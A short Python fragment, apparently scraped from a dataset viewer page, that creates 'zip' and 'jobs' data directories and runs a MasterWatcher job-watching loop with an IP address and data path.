zip_dir = os.path.join(data_path, 'zip')
job_dir = os.path.join(data_path, 'jobs')
for dir_ in (root, zip_dir, job_dir):
makedirs(dir_)
with MasterWatcher(root, zip_dir, job_dir, ip_address=ip,
data_path=data_path, force=force) \
as master_watcher:
master_watcher.run() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.